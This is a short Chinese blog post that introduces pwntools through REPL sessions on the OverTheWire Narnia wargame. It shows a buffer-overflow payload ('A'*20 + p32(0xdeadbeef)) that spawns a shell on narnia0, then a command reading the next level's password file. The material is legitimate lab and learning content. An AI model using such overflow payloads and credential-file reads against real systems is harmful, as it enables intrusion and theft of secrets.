pwntools初体验
来源:互联网 发布:软件测试基础方法 编辑:程序博客网 时间:2024/06/01 09:21
Python 2.7.12 (default, Sep 28 2016, 18:41:32)
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin
Type “help”, “copyright”, “credits” or “license” for more information.
>>> from pwn import *
>>> help(context)
>>> context(arch=’i386’, os=’linux’)
>>> s = ssh(user=’narnia0’, host=’narnia.labs.overthewire.org’, password=’narnia0’)
[x] Connecting to narnia.labs.overthewire.org on port 22
[+] Connecting to narnia.labs.overthewire.org on port 22: Done
[ERROR] Could not find ‘objcopy’ installed for ContextType(arch = ‘i386’, aslr = True, bits = 32, endian = ‘little’, log_level = 40, os = ‘linux’)
Try installing binutils for this architecture:
https://docs.pwntools.com/en/stable/install/binutils.html
[*] narnia0@narnia.labs.overthewire.org:
Distro Ubuntu 14.04
OS: linux
Arch: amd64
Version: 4.8.6
ASLR: Disabled
>>> sh = s.run(‘pwd’)
[x] Opening new channel: ‘pwd’
[+] Opening new channel: ‘pwd’: Done
>>> print sh
>>> sh = s.run(‘ls’)
[x] Opening new channel: ‘ls’
[+] Opening new channel: ‘ls’: Done
>>> exit()
[*] Closed SSH channel with narnia.labs.overthewire.org
[*] Closed SSH channel with narnia.labs.overthewire.org
当然,上面这样直接退出python而代指ssh连接断开有些粗暴。
下面就礼貌些。
➜ Narnia git:(master) python [21:36:07]
Python 2.7.12 (default, Sep 28 2016, 18:41:32)
[GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin
Type “help”, “copyright”, “credits” or “license” for more information.
>>> from pwn import *
>>> context(arch=’i386’, os=’linux’)
>>> s = ssh(user=’narnia0’, host=’narnia.labs.overthewire.org’, password=’narnia0’)
[x] Connecting to narnia.labs.overthewire.org on port 22
[+] Connecting to narnia.labs.overthewire.org on port 22: Done
[ERROR] Could not find ‘objcopy’ installed for ContextType(arch = ‘i386’, aslr = True, bits = 32, endian = ‘little’, log_level = 40, os = ‘linux’)
Try installing binutils for this architecture:
https://docs.pwntools.com/en/stable/install/binutils.html
[*] narnia0@narnia.labs.overthewire.org:
Distro Ubuntu 14.04
OS: linux
Arch: amd64
Version: 4.8.6
ASLR: Disabled
>>> sh = s.run(‘/narnia/narnia0’)
[x] Opening new channel: ‘/narnia/narnia0’
[+] Opening new channel: ‘/narnia/narnia0’: Done
>>> sh.sendline(‘A’*20 + p32(0xdeadbeef))
>>> sh.sendline(‘cat /etc/narnia_pass/narnia1’)
>>> print sh.recvline()
Correct val’s value from 0x41414141 -> 0xdeadbeef!
>>> print sh.recvline()
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ�
>>> print sh.recvline()
val: 0xdeadbeef
>>> print sh.recvline()
$ efeidiedae
>>> s.close()
[*] Closed connection to ‘narnia.labs.overthewire.org’
>>> exit()
[*] Closed SSH channel with narnia.labs.overthewire.org
[*] Closed SSH channel with narnia.labs.overthewire.org
感觉这样不会有ssh在终端输入的时候的延时问题?
还可以方便地同时在一个终端里做其他事。
- pwntools初体验
- Python - pwntools
- pwntools使用简介
- pwntools pwnlib.gdb
- pwntools 简单用法
- pwntools安装使用方法
- pwntools安装使用方法
- pwntools的常见用法
- 利用 pwntools 编写 socket 脚本
- 学习记录:pwntools安装及其环境配置
- 初体验
- 初体验
- 初体验
- 初体验
- 初体验
- 初体验
- 初体验
- pwntools 无法在deepin 下gdb.attach的问题
- linux中rpm命令的一些使用总结
- 散列函数设计:除留余数法
- 三条技巧让你的译文“说得通”
- 合数分解 UVA
- web.xml version3.1 配置
- pwntools初体验
- flex布局
- POJ 3213 PM3 可能会
- 每天一个adb命令:am 命令详解
- 练习系统 实验一 谁拿了最多的奖学金
- 并规排序求逆序对数 hud 4911
- 传感器
- spring参数注入细节
- 108. Convert Sorted Array to Binary Search Tree